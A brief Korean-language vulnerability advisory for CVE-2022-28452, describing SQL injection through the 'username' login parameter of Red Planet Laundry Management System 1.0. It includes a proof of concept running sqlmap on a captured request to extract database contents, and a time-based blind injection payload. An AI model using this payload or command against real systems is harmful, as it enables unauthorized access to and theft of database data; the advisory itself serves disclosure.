
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-설명:
Red Planet Laundry Management System 1.0은 /index.php/login/rediract 에서 'username' 매개변수를 통해 SQL 주입에 취약합니다. 이 문제를 악용하면 공격자가 애플리케이션을 손상시키고, 데이터에 접근하거나 수정하거나, 기본 데이터베이스의 잠재적 취약점을 악용할 수 있습니다.
2-개념 증명:
Burpsuite에서 영향을 받는 페이지의 요청을 'username' 매개변수와 함께 가로채서 poc.txt로 저장합니다. 그런 다음 SQLmap을 실행하여 데이터베이스에서 데이터를 추출합니다: sqlmap.py -r poc.txt --dbms=mysql
3-예시 페이로드:
URL 인코딩된 POST 입력 username이 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z로 설정됨
연락처: [email protected]